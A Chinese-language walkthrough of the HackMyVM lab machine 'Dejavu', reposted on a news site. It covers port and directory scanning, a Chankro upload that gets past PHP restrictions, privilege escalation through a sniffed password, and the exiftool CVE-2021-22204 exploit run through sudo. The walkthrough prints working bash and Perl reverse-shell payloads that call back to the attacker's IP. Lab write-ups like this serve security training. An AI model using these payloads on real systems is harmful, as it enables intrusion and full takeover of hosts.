当前位置: 首页 > news >正文

HackMyVM-Dejavu

news 2025/6/12 21:47:49

信息搜集

主机发现

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:39:60:4c, IPv4: 192.168.43.126
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1    c6:45:66:05:91:88       (Unknown: locally administered)
192.168.43.197  04:6c:59:bd:33:50       Intel Corporate
192.168.43.209  08:00:27:32:ef:93       PCS Systemtechnik GmbH
192.168.43.156  b2:a8:93:0d:fb:bd       (Unknown: locally administered)4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.009 seconds (127.43 hosts/sec). 4 responded

端口扫描

┌──(kali㉿kali)-[~]
└─$ nmap --min-rate 10000 -p- 192.168.43.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 23:40 EDT
Nmap scan report for dejavu (192.168.43.209)
Host is up (0.000084s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:32:EF:93 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 1.92 seconds┌──(kali㉿kali)-[~]
└─$ nmap -sT -sV -O -p22,80 192.168.43.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 23:41 EDT
Nmap scan report for dejavu (192.168.43.209)
Host is up (0.00027s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 08:00:27:32:EF:93 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.67 seconds

漏洞利用

目录扫描

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.43.209 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,txt,php,jpg,png,git,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.43.209
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              png,git,zip,html,txt,php,jpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/.html                (Status: 403) [Size: 279]
/info.php             (Status: 200) [Size: 69969]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 279]
Progress: 8982631 / 9482040 (94.73%)[ERROR] Get "http://192.168.43.209/comment-script": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

/info.php找到了一段注释

在这里插入图片描述

/S3cR3t

在这里插入图片描述

查看一下upload.php

在这里插入图片描述

有防护,使用Chankro,上传一个反弹shell

在这里插入图片描述

┌──(kali㉿kali)-[~]
└─$ cat 1.sh 
bash -c 'bash -i >& /dev/tcp/192.168.43.126/4444 0>&1'
┌──(kali㉿kali)-[~]
└─$ python2 Chankro/chankro.py --arch 64 --input 1.sh --output 4444.phtml --path /var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats -=[ Chankro ]=--={ @TheXC3LL }=-[+] Binary file: 1.sh
[+] Architecture: x64
[+] Final PHP: 4444.phtml[+] File created!

获取到了shell

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.43.126] from (UNKNOWN) [192.168.43.209] 53064
bash: cannot set terminal process group (771): Inappropriate ioctl for device
bash: no job control in this shell
<nMostCriticalInternetSecurityThreats/S3cR3t/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<nMostCriticalInternetSecurityThreats/S3cR3t/files$

权限提升

上传一下脚本,看一看有没有可以利用的

在这里插入图片描述

尝试抓一下包,发现了密码:9737bo0hFx4

在这里插入图片描述

切换到robert用户

<nMostCriticalInternetSecurityThreats/S3cR3t/files$ su robert
su robert
Password: 9737bo0hFx4
id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(pcap)

user.txt

robert@dejavu:~$ cat user.txt
cat user.txt
HMV{c8b75037150fbdc49f6c941b72db0d7c}

发现可利用的地方

robert@dejavu:~$ sudo -l
sudo -l
Matching Defaults entries for robert on dejavu:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser robert may run the following commands on dejavu:(root) NOPASSWD: /usr/local/bin/exiftool
robert@dejavu:~$ head -15 /usr/local/bin/exiftool
head -15 /usr/local/bin/exiftool
#!/usr/bin/perl -w
#------------------------------------------------------------------------------
# File:         exiftool
#
# Description:  Read/write meta information
#
# Revisions:    Nov. 12/03 - P. Harvey Created
#               (See html/history.html for revision history)
#------------------------------------------------------------------------------
use strict;
require 5.004;my $version = '12.23';# add our 'lib' directory to the include list BEFORE 'use Image::ExifTool'

在这里插入图片描述

提权

robert@dejavu:~$ python3 50911.py -s 192.168.43.126 1234
python3 50911.py -s 192.168.43.126 1234_ __,~~~/_        __  ___  _______________  ___  ___,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \|/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....RUNNING: UNICORD Exploit for CVE-2021-22204
PAYLOAD: (metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(1234,inet_aton('192.168.43.126')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};")        
RUNTIME: DONE - Exploit image written to 'image.jpg'robert@dejavu:~$ sudo /usr/local/bin/exiftool image.jpg
sudo /usr/local/bin/exiftool image.jpg┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 1234          
listening on [any] 1234 ...
connect to [192.168.43.126] from (UNKNOWN) [192.168.43.209] 33370
# id
uid=0(root) gid=0(root) groups=0(root)

root.txt

# cat r0ot.tXt
HMV{c62d75d636f66450980dca2c4a3457d8}
http://www.xdnf.cn/news/707941.html

相关文章:

  • Spark-Core Project
  • scp 命令
  • Unity开发之Webgl自动更新程序包
  • 4.1.1 Spark SQL概述
  • spark在执行中如何选择shuffle策略
  • Java开发经验——阿里巴巴编码规范实践解析6
  • 【Linux篇】叩响新世界的大门:线程
  • 【stm32开发板】原理图设计(电源部分)附:设计PCB流程
  • SmolVLM2: The Smollest Video Model Ever(七)
  • Kafka核心技术解析与最佳实践指南
  • BPE、WordPiece 与 Unigram:三种主流子词分词算法对比
  • 关于测试小记
  • flutter项目迁移空安全
  • ADQ36-2通道2.5G,4通道5G采样PXIE
  • 5G-A时代与p2p
  • 晶振频率稳定性:5G 基站与航天设备的核心竞争力
  • Axios 如何通过配置实现通过接口请求下载文件
  • 网络渗透基础:信息收集
  • thinkphp 5.1 部分知识记录<一>
  • t013-集团门户网站设计与实现 [基于springboot+Vue 含材料及源码]
  • 机器学习算法--随机森林
  • 13 接口自动化-框架封装之 csv 数据驱动封装和日志
  • SOC-ESP32S3部分:18-串口
  • Linux进程初识
  • 链表经典题目(力扣 easy)
  • 从汇编的角度接密C++函数重载,原来这么简单
  • 人工智能在智能零售中的创新应用与未来趋势
  • Unity Button 交互动画
  • 工厂模式 vs 策略模式:设计模式中的 “创建者” 与 “决策者”
  • Vulhub靶场搭建(Ubuntu)